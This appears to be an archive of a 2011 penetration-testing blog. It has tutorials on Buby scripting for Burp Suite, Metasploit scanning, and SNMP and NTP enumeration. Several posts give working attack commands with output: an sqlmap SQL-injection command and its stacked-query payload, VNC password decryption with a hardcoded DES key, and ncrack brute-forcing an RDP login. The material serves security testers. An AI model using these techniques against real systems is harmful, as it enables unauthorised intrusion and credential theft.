Next bit of code basically says, if this message is in scope AND is a request message, start performing an active scan. Otherwise if it is a message which is in scope but a response message then perform passive scanning.

$burp.do_active_scan takes 4 objects
-rhost => host value
-rport => port value
-pre_bool => true/false based on whether or not it is https
-message => String value (or Java bytes), full message (request only of course)

$burp.do_passive_scan takes 5 objects

-rhost => host value

-rport => port value

-pre_bool => true/false based on whether or not it is https

-@@msg => request message, string value (or Java bytes)
-message => response message, string value (or Java bytes)

Okay, next up is Part 5 of this series where we will cover the rest of the methods listed above.

Happy Hacking,

~cktricky

Buby Script Basics Part 3

2011-05-11T06:28:00.000-04:00

In part 2 of this series we covered the "evt_proxy_message" method. In part 3 of this series we will cover the two methods shown below which have "checks" next to them.

√ evt_http_message
√ evt_scan_issue
   doActiveScan
   doPassiveScan
   excludeFromScope
   includeInScope
   isInScope
   issueAlert
   makeHttpRequest
   sendToIntruder
   sendToRepeater
   sendToSpider

So let's cover each individually with brief explanation and a code example.

You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

EVT_HTTP_MESSAGE
---------------------------------

The following code will allow you to obtain methods exposed by the message_info object (which is a class):

The 3 separate objects that make up the param are:

tool_name => This is a string value, it is the name of the tool for which the message originated. Examples include proxy, scanner and repeater.

is_request => Boolean value (true/false), this returns true when it is a request and false when a response.

message_info => This is a class. It is an instance of the IHttpRequestResponse Java class. So there are methods such as get_comment, set_comment and getUrl exposed.

An example of using evt_http_message can be seen here (code):

....and the result

w00t!

So what does the code actually do?

Lines 1 and 2 - Define the method and separate param into 3 separate objects.

Lines 3-5

Ln 3 If the tool the message originated from was the spider and this is NOT a request proceed to Ln 4.

Ln4 If the response status code is 200 (OK), then move to Ln 5.

Ln 5 Puts "Yo, we received a 200 FTW!" to the console.

Lines 6-9 Are closing statements/method and passing the param back up to the superclass method.

You can find another example using this method in the zlib_inflate.rb script.

EVT_SCAN_ISSUE
---------------------------

The following code will allow you obtain methods exposed by the issue object (which is a class):

Only one object is exposed, it is a class, it is called issue. Some of the methods exposed by this class are

-issue_name
-severity
-confidence
-protocol
-host
-url
-port
-issue_detail
-issue_background
-remediation_detail
-remediation_background

The following code:

...produces:

Lets step through the code

1. def prnt(*objs)
2. strn, meth = objs
3. str = ''
4. str << "\n#{strn}\n"
5. str << '=' * strn.length + "\n\n"
6. str << "#{meth}\n"
7. puts str
8. end

Lines 1-2 - Defines the method (prnt) and separates objs into two objects (strn, meth).

Lines 3-4 - This defines a string instance variable (str), and then proceeds to put the strn object onto it.

Lines 5-7 - The length of strn gets multiplied by '=' so that we can create the following visual....

Example:

something
=========

...then we push meth onto the string and then we "puts" or print it to the console.

Lets step through the second method "hm_prnt".

1. def hm_prnt(*objs)
2. strn, meth = objs
3. str = ''
4. str << "\n#{strn}\n"
5. str << '=' * strn.length + "\n\n"
6. meth.each do |itm|
7. str << "#{itm.request_headers}\n"
8. str << "#{itm.request_body}\n"
9. str << "#{itm.response_headers}\n"
10. str << "#{itm.response_body}\n"
11. end
12. puts str
13 . end

Lines 1-2 - Defines the method (prnt) and separates objs into two objects (strn, meth).

Lines 3-4 - This defines a string instance variable (str), and then proceeds to put the strn object onto it.

Lines 6-10 - We take the meth object which is an Array, we iterate thru each item in the array, convert it to a string while calling the four methods it exposes (request_headers, request_body, response.headers, and response_body). Now these methods all belong to http_messages and itm really represents the http_messages class. So when we are iterating thru this array we are really iterating thru an array containing a bunch of http_messages classes. Hopefully that makes sense.

Finally, we need to discuss the $burp.evt_scan_issue method.

1. def $burp.evt_scan_issue(issue)
2. meth_arry = [
3. 'issue_name',
4. 'severity',
5. 'confidence',
6. 'protocol',
7. 'host',
8. 'url',
9. 'port',
10. 'issue_detail',
11. 'issue_background',
12. 'remediation_detail',
13. 'remediation_background',
14. ]
15.
16. meth_arry.each do |meth|
17. prnt("#{meth}", "#{issue.send("#{meth}")}")
18. end
19.
20. hm_prnt('http_messages', issue.http_messages)
21.
22. end

Line 1 - Defines the method ($burp.evt_scan_issue) and instantiates the "issue" object.

Lines 2-14 - Creates an Array called "meth_array" which consists of methods associated with the issue object instantiated on line 1.

Lines 16-18 - Iterates thru the meth_arry we created on line 2 picking out each method and then sends the method name and the method itself to prnt.

Line 20 - The http_message method attached to the issue object isn't in the meth_arry because it can't be called directly and converted to a string. This is because http_message is a an array of classes. Each class has it's own methods. So, we made a special prnt method for it called hm_prnt.

Well that is all for Part 3 of this series. Part 4 will cover some of the other methods listed in the first part of this post. If you have any feedback please provide it so that the series can be improved upon.

Happy Hacking,

~cktricky

Buby Script Basics Part 2

2011-05-08T17:33:00.000-04:00

In part 1 of this series, we've discussed a few options via the command line. In this part of the series, we will focus on actually writing a script. If you remember, to run the script you can type:

jruby -S buby -B burp.jar -r myscript.rb

**(myscript.rb is your buby script)**

I've provided some sample scripts Here .

Lets cover one of the most used methods (in my opinion/experience) exposed by buby called "evt_proxy_message". I'd like to cover some of the objects exposed by this method and to best accomplish this task we will step through the cookie_snatch.rb script located Here.

So here is the code from "cookie_snatch.rb"

def $burp.evt_proxy_message(*param)
msg_ref, is_req, rhost, rport, is_https, http_meth, url, resourceType, status, req_content_type, message, action = param
  file = ('cookiez.txt')
  prefix = is_https ? "https://" : "http://"
  rurl = "#{prefix}://#{rhost}:#{rport}"
  if is_req == false
   spmsg = message.split("\n\n")
   short_msg = "#{spmsg[0]}"
   mitem = short_msg.match(/^Set-Cookie:.+$/)
   if $burp.in_scope?(rurl)
   if !mitem.nil?
   File.open(file, "a") {|f| f.write("#{mitem}")}
   end
   end
  end
super(*param)
end

On the second line you see that we convert *param to 12 separate objects. Here is a brief explanation of each:

msg_ref

=====

This is the request/response number. It is nothing more than a tracking number.

is_req

====

This is a boolean value, returns either true or false. If it is a request, this returns true, else, false.

rhost

===

This is your target's hostname ONLY.

It does NOT include the prefix (http/s), rport (80/443), or path (/directory/something.php).

rport

===

This is the remote port value (80/443/etc)

is_https

======

Returns true when https and false when http.

http_meth

=======

This is the method (GET/POST/etc)

url

This is the path portion of a URL. Not the full URL itself.

Example: If the target was http://www.target.com/mydir/test.aspx then url would be

/mydir/test.aspx

resourceType

==========

The filetype of the requested resource, or nil if the resource has no filetype

status

====

The HTTP status code returned by the server. This value is nil for request messages.

req_content_type

============

String value, content-type header returned by the server. (nil for requests)

message

======

String value, the entire message, regardless of request/response, contains headers and body.

action

====

There are 4 types of actions

ACTION_FOLLOW_RULES (0, this is the default)

ACTION_DO_INTERCEPT (1, direction to intercept a msg)

ACTION_DONT_INTERCEPT (2, don't intercept the msg)

ACTION_DROP (3, drops the in/outbound msg)

Example of using action (folks seem to have some confusion at times regarding this):

if rhost == "www.example.com

action[0] = 2

end

The above code logic is, if the rhost value is www.example.com then don't intercept. The full code can be found in dont_intercept.rb in the Buby-Scripts repo.

Back to the code:

Lines 3-5

Ln 3 is assigning cookiez.txt to 'file'.

Ln 4 is evaluating the boolean value behind is_https?. If it is true then prefix = https:// and if false, http://.

Ln 5 is creating a rurl object which consists of a string concatenation of prefix, rhost and rport.

Lines 6-9

Ln 6 is evaluating if is_req equals false (meaning it is a response). So unless it is a response, the code following it won't be run.

Ln 7 spmsg (split message) is the message string split by two newlines. This separates the headers from the body. Array item 0 of spmsg (spmsg[0]) is going to be the headers and spmsg[1] will be the body.

Ln 8 short_msg is assigned to spgmsg[0], converted to a string.

Ln 9 assigns mitem to a the Set-Cookie portion of the response header.

Lines 10-12

Ln 10 uses the method in_scope?, which takes the full URL. This is the reason for creating the rurl object on line 5. If the response is from a site that is in scope, we evaluate the next 2 lines of code.

Ln 11 basically if mitem (the Set-Cookie key, value) isn't nil, then we evaluate line 12.

Ln 12 Open the file (file is created on line 3 and it is cookiez.txt), and write to it. Because we have assigned "a" instead of "w", the cookies will be appended versus overwritten.

The rest of the code terminates "if" statements and sends the params up to the super class's version of evt_proxy_msg. This super(*params) can be nice when you'd like to modify data prior to it's arrival to Burp.

Okay, well hopefully this was a good start for those interested in extending Burp's capabilities.

Part 3 in this series will cover other useful methods exposed by Buby.

~Happy Hacking

cktricky

Buby Script Basics Part 1

2011-05-07T20:59:00.000-04:00

For those of you who are new to Buby, it is a platform to write Ruby based extensions for the Burp Suite API and I'm going to attempt to cover some of the basics. First let me say thank you to Tebo for providing his insight. Tebo is the author of the Buby.kicks_ass => true article. Additionally, thank you Eric Monti the creator of Buby. Buby's homepage is located Here .

Installing:

Although you can write Ruby code, this is a JRuby Gem. What does this mean? It means that the code execution environment is JRuby (Java+Ruby) and the Gem should be installed in the JRuby environment.

Lets install JRuby first:

Next, install the Buby Gem.

Basic example of running a script:

The options you see explained

jruby -S buby => runs the jruby environment leveraging the buby gem

-i => interactive, this means you can interact with Burp from the console.

-B => this is the location of your Burp jar file

-r => The script you'd like to run. This is an easy way to run the buby code you've created.

Finally, an example of sending a command to burp via the -i (interactive option). Here we produce an alert "Hello World".

Pre-command

Command

Post Command

Okay so that wraps up Part 1 of Buby Basics.

If you'd like some scripts to mess around before Part 2, you can find some scripts I put together Here.

~Happy Hacking

cktricky

Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2

2011-04-27T09:15:00.001-04:00

In the previous post I talked about using the db_service -R to use the information in your database/workspace to throw an auxiliary module at hosts that had port 443 open.

Let's take this one step further...and throw multiple aux modules against the hosts that have port 80 open.

I'm going to use a resource script to do this. The cool thing about resource scripts is that you dont have to do them just at startup. You can do them anytime on the console.

msf auxiliary(options) > resource
Usage: resource path1 path2 ...

Run the commands stored in the supplied files.

In this case i want to run two modules against every port that has 80 open. Here's some code to do it:


set THREADS 10

[ruby] **#replace [ and ] with their respective "<" or ">"**'

#start with an array to hold our modules we want to run
modules = [
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/http/options",]

#another array for our hosts
hosts = []
framework.db.services.each do |service| 
 if service.port == 443 
  hosts << service.host.address
 end
end

#loop through each module in the list
modules.each do |blah|
 self.run_single("use #{blah}")
  puts ("\nRunning Auxiliary Module #{blah}")
                #for each host with 443 open, set appropriate configs and run the module against it
  hosts.each do |rhost|
          self.run_single("set RHOSTS #{rhost}")
   self.run_single("set RPORT 443") #change to the port above
   self.run_single("set SSL TRUE")
          self.run_single("run")
  end 
end
[/ruby] **#replace [ and ] with their respective "<" or ">"**

Running it:


msf auxiliary(options) > resource /home/user/.msf3/aux_do_dbhosts.rc 
resource (/home/user/.msf3/aux_do_dbhosts.rc)> set THREADS 10
THREADS => 10
[*] resource (/home/user/.msf3/aux_do_dbhosts.rc)> Ruby Code (962 bytes)

Running Auxiliary Module auxiliary/scanner/http/http_version
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.106
RPORT => 443
SSL => TRUE
[*] 192.168.1.106 nginx/0.6.32 ( 302-http://192.168.1.106/ )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.107
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.135
RPORT => 443
SSL => TRUE
[*] 192.168.1.135 Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g Phusion_Passenger/2.2.15 ( Powered by Phusion Passenger (mod_rails/mod_rack) 2.2.15 )
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.168
RPORT => 443
SSL => TRUE
[*] 192.168.1.168 Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/1.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.229
RPORT => 443
SSL => TRUE
[*] 192.168.1.229 Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 ( Powered by PHP/5.3.2-0.dotdeb.1 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running Auxiliary Module auxiliary/scanner/http/options
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.100
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
...SNIP...YOU GET THE IDEA...

-CG

thanks to hdm and jcran

Running Auxiliary Modules Against Multiple Hosts the Smart Way

2011-04-25T15:42:00.003-04:00

So a coulple of cool updates lately to metasploit framework. If you check out db_services you'll see a super handy feature of "-R"


msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

 -a   Search for a list of addresses
 -c     Only show the given columns
 -h,--help         Show this help information
 -n   Search for a list of service names
 -p   Search for a list of ports
 -r      Only show [tcp|udp] services
 -u,--up           Only show services which are up
 -o          Send output to a file in csv format
 -R,--rhosts       Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

In the past you could list your hosts by port (db_services -p 80) but I want to be able to USE those hosts and throw modules at them, bring in the -R option

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
192.168.1.245  80    tcp    http  open   Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246  80    tcp    http  open   Apache/2.2.3 (CentOS)
192.168.1.247  80    tcp    http  open   Apache/2.2.12 (Ubuntu)
192.168.1.248  80    tcp    http  open   lighttpd/1.5.0
192.168.1.249  80    tcp    http  open   Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251  80    tcp    http  open   Apache
192.168.1.254  80    tcp    http  open   Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

-CG

Data Driven Pentests...Don't You mean Vulnerability Assessments?

2011-04-15T22:14:00.005-04:00

So first a disclaimer, i didnt listen to the referenced podcast, this is based solely of this blog post:

http://newschoolsecurity.com/2011/04/data-driven-pen-tests

So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.
What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”
We could also use more shared data about what tests tend to work.
Thoughts?

Dre's response to the post was surprising to me, he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, i'll give the people that. But to me when we start jumping into repeatable metrics driven stuff we are in Vulnerability Assessment land, not pentesting land.

Here is the comment I left:

I like the idea and i think it could be useful.
However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.
pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.

I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for human's time you should be paying for them to go after the site like a human would and not how a scanner would or not in a way where i'm worried about religiously following some checklist because if i don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner wise.

as an added bonus this post was right below the new school post in my Google reader:

http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html

This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.

I think it drives the point home as well.

-CG

New SNMP Metasploit Modules

2011-03-23T16:27:00.004-04:00

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run

[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run

[+] 192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sqlmap with POST requests

2011-03-21T08:29:00.002-04:00

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string

--postfix=POSTFIX <-- Injection payload postfix string

--dbms=DBMS <--Force back-end DBMS to this value

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request

user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---

I forgot my NTP stuff, so here's more notes on it

2011-03-18T10:56:00.000-04:00

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:

http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205

http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]

ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>

chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030

ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host
current host is 192.168.1.60

ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames
hostnames being shown

ntpq> keytype
keytype is MD5

ntpq> ntpversion
NTP version being claimed is 2

ntpq> associations

ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4

ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96

chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476

chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de

chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore

VNC passwords and Metasploit and DES

2011-03-15T22:32:00.003-04:00

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass

or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.

wXf released, thoughts, comments

2011-02-10T15:15:00.000-05:00

Today we've released the beta version (rough, rough version) of wXf by making the repository public. Over the last year we've worked on this code in an "on again - off again" fashion. Since we've started the project we've learned a lot. I know I've personally learned a ton about Ruby and Metaprogramming (check out Paola Perrotta's book if you get a chance). We've rewritten the code several times but we've reached the point where it is at least stable enough to release. Now others have the chance to improve on it.

We've gotten loads of feedback from the beta group (consisting of a few volunteers) which has helped us tremendously with some of the usability and documentation. Additionally, we've started to gauge what people do and do not want to see. We know that the AppSec community doesn't want another point and click tool and certainly doesn't need another scanner.

The biggest question posed to us over the last 11 months was "Why not merge with (insert framework here)". The answer is actually incredibly simple and is the basis for why we created the software. We'd like the community of testers/consultants/developers/etc to decide what they want to see most.

To have the ability to adapt an entire framework to the user base and change it as needed is only feasible if we a) have total flexibility in modifying ANY portion of the code and b) aren't pigeonholed into just one area of focus (exploitation, scanning).

Whether it be source code review, exploitation, enumeration, fuzzing modules, phishing, mobile appsec or whatever else.......... we'd like to glue together some of the ideas and scripts of the community at large. So please contribute. Submit bugs, provide feedback, help with the wiki or develop modules. Every little bit counts.

wXf GitHub Page

Thanks!

Ken

move over tsgrinder/tscrack hello ncrack!

2011-02-09T18:41:00.003-05:00

So thanks to mubix for telling me that ncrack now supports RDP. very cool stuff.

user@ubuntu:~/pentest/ncrack$ ncrack -vv -d7 --user administrator 192.168.1.100:3389,CL=10

Fetchfile found /usr/local/share/ncrack/default.pwd

Starting Ncrack 0.3ALPHA ( http://ncrack.org ) at 2011-02-09 15:28 PST

rdp://192.168.1.100:3389 (EID 1) Login failed: 'administrator' '123456'
rdp://192.168.1.100:3389 (EID 1) Attempts: total 1 completed 1 supported 1 --- rate 0.96
...
rdp://192.168.1.100:3389 (EID 1518) Login failed: 'administrator' 'pitbull'
rdp://192.168.1.100:3389 (EID 1518) Attempts: total 1519 completed 1513 supported 1 --- rate 3.10
rdp://192.168.1.100:3389 (EID 1520) Login failed: 'administrator' 'geraldine'
rdp://192.168.1.100:3389 (EID 1520) Attempts: total 1520 completed 1514 supported 1 --- rate 3.17
rdp://192.168.1.100:3389 (EID 1522) Login failed: 'administrator' 'allstar'
rdp://192.168.1.100:3389 last: 0.00 current 0.00 parallelism 10
rdp://192.168.1.100:3389 Increasing connection limit to: 10
rdp://192.168.1.100:3389 (EID 1522) Attempts: total 1521 completed 1515 supported 1 --- rate 3.00
...

Keep in mind that against XP you can only have one connection at a time so you'll have to set your Connection Limit value to 1 (CL=1)

wXf presentation video

2011-02-03T16:18:00.000-05:00

As an update, wXf is almost ready to move forward with it's first release. Hopefully the software is what folks expected as we are still learning from and adapting to the beta group's feedback.

In the meantime, if you couldn't attend AppSec DC 2010, here is the video of the presentation Chris Gates, Seth Law and I put together. Unfortunately Seth Law could not make it due to a prior engagement but nevertheless contributed to the content.

Make sure to check out all of the great presentations that AppSec DC had under the asdc10 group on vimeo. Doug Wilson and Mark Bristow did a fantastic job organizing this conference and my hat goes off to them.

wxf: Web Exploitation Framework with Ken Johnson, Fishnet Security and Chris Gates, No Affiliation. from OWASP DC on Vimeo.

Reactions to comments from Val's post #1

2011-01-26T11:34:00.001-05:00

received this comment to Val's post

"Submitted by Anonymous on Tue, 01/04/2011 - 09:33.
The problem with pentesters phishing ...

The problem with pentesters phishing ... is that it does more harm then good for the organization. Without the education piece following a phish, you setup the organization to ban the practice."

Phishing and client-side attacks have been going on for far too long to not allow your testers to use them during test.**

So on one hand you are correct, every phishing exercise done either by an internal team, pentester, or attacker should be followed by an education piece by your internal security/IT team. Every phishing attack is an opportunity to retrain users.

On the other other hand, its how people get in. To broadly call it useless because 1. you are too lazy to educate your users after the fact or 2. didn't think ahead enough to require the PT shop to leave you with education materials or follow up the phish with an education piece doesn't mean it lacks value.

Like I mentioned in the previous post, you need to know how you are going to stand up in realistic scenarios. Does one client-side 0day leave your whole network open to all sorts of badness? you need to know.

